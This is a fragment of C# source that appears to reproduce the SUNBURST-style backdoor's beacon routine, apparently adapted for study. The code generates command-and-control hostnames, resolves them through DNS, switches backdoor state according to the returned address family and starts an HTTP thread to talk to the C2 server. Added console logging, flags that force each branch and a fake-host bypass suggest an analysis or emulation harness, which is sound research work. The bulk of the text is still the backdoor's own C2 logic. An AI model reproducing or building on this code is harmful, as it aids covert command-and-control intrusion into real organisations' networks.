public IPAddressesHelper(string subnet, string mask, AddressFamilyEx family) : this(subnet, mask, family, false) { // Disabled for security reasons //this.subnet = IPAddress.Parse(subnet); //this.mask = IPAddress.Parse(mask); //this.family = family; }
public IPAddressesHelper(string subnet, string mask, AddressFamilyEx family, bool ext) { // Disabled for security reasons //this.subnet = IPAddress.Parse(subnet); //this.mask = IPAddress.Parse(mask); //this.family = family; //this.ext = ext; }
public static bool CheckServerConnection(string hostName) { try { IPHostEntry iphostEntry = DnsHelper.GetIPHostEntry(hostName); if (iphostEntry != null) { IPAddress[] addressList = iphostEntry.AddressList; for (int i = 0; i < addressList.Length; i++) { AddressFamilyEx addressFamily = IPAddressesHelper.GetAddressFamily(addressList[i]); if (addressFamily != AddressFamilyEx.Error && addressFamily != AddressFamilyEx.Atm) { return(true); } } } } catch (Exception) { } return(false); }
private static void Update() { bool flag = false; CryptoHelper cryptoHelper = new CryptoHelper(userId, domain4); HttpHelper httpHelper = null; Thread thread = null; bool flag2 = true; AddressFamilyEx addressFamilyEx = AddressFamilyEx.Unknown; int num = 0; bool flag3 = true; DnsRecords dnsRecords = new DnsRecords(); Random random = new Random(); int a = 0; if (!UpdateNotification()) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification() failed."); return; } Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification() complete."); Settings.svcListModified2 = false; int num2 = 1; while (num2 <= 3 && !flag) { Utilities.DelayMin(dnsRecords.A, dnsRecords.A); if (!ProcessTracker.TrackProcesses(true)) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - TrackProcesses() complete."); if (Settings.svcListModified1) { flag3 = true; } num = (Settings.svcListModified2 ? (num + 1) : 0); string hostName; if (status == ReportStatus.New) { hostName = ((addressFamilyEx == AddressFamilyEx.Error) ? cryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out flag2)); Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - hostName var set to: " + hostName); } else { if (status != ReportStatus.Append) { break; } hostName = (flag3 ? cryptoHelper.GetNextStringEx(dnsRecords.dnssec) : cryptoHelper.GetNextString(dnsRecords.dnssec)); Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - hostName var set to: " + hostName); } Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor is pulling the dnsRecords of C2: " + dnsRecords); if (bypassn) { hostName = Settings.fakehost; Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Bypassing original C2 hostname and instead will be using " + hostName); } addressFamilyEx = DnsHelper.GetAddressFamily(hostName, dnsRecords); Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - AddressFamily is (-1 Netbios, -2 ImpLink, -3 Atm, -4 Ipx, -5 InterNetwork, -6 InterNetworkV6, -7 Unknown, -8 Error) : " + addressFamilyEx + " [-1-8 to force Family]"); if (forcea) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Netbios family"); addressFamilyEx = AddressFamilyEx.NetBios; dnsRecords.cname = Settings.fakehost; } if (forceb) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing ImpLink family"); addressFamilyEx = AddressFamilyEx.ImpLink; } if (forcec) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Atm family"); addressFamilyEx = AddressFamilyEx.Atm; } if (forced) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Ipx family"); addressFamilyEx = AddressFamilyEx.Ipx; } if (forcee) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing InterNetwork family"); addressFamilyEx = AddressFamilyEx.InterNetwork; } if (forcef) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing InterNetworkV6 family"); addressFamilyEx = AddressFamilyEx.InterNetworkV6; } if (forceg) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Unknown family"); addressFamilyEx = AddressFamilyEx.Unknown; } if (forceh) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Error family"); addressFamilyEx = AddressFamilyEx.Error; } switch (addressFamilyEx) { case AddressFamilyEx.NetBios: if (status == ReportStatus.Append) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor status is APPEND"); flag3 = false; if (dnsRecords.dnssec) { a = dnsRecords.A; dnsRecords.A = random.Next(1, 3); } } if (status == ReportStatus.New && flag2) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor status is NEW"); status = ReportStatus.Append; ConfigManager.WriteReportStatus(status); } if (!string.IsNullOrEmpty(dnsRecords.cname)) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - HTTPHELPER"); dnsRecords.A = a; HttpHelper.Close(httpHelper, thread); httpHelper = new HttpHelper(userId, dnsRecords); if (!Settings.svcListModified2 || num > 1) { Settings.svcListModified2 = false; thread = new Thread(new ThreadStart(httpHelper.Initialize)) { IsBackground = true }; thread.Start(); } } num2 = 0; break; case AddressFamilyEx.ImpLink: case AddressFamilyEx.Atm: ConfigManager.WriteReportStatus(ReportStatus.Truncate); ProcessTracker.SetAutomaticMode(); flag = true; break; case AddressFamilyEx.Ipx: if (status == ReportStatus.Append) { ConfigManager.WriteReportStatus(ReportStatus.New); } flag = true; break; case AddressFamilyEx.InterNetwork: case AddressFamilyEx.InterNetworkV6: case AddressFamilyEx.Unknown: goto IL_1F7; case AddressFamilyEx.Error: dnsRecords.A = random.Next(420, 540); Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Random dnsRecord generated."); break; default: goto IL_1F7; } IL_1F9: num2++; continue; IL_1F7: flag = true; goto IL_1F9; } break; } HttpHelper.Close(httpHelper, thread); }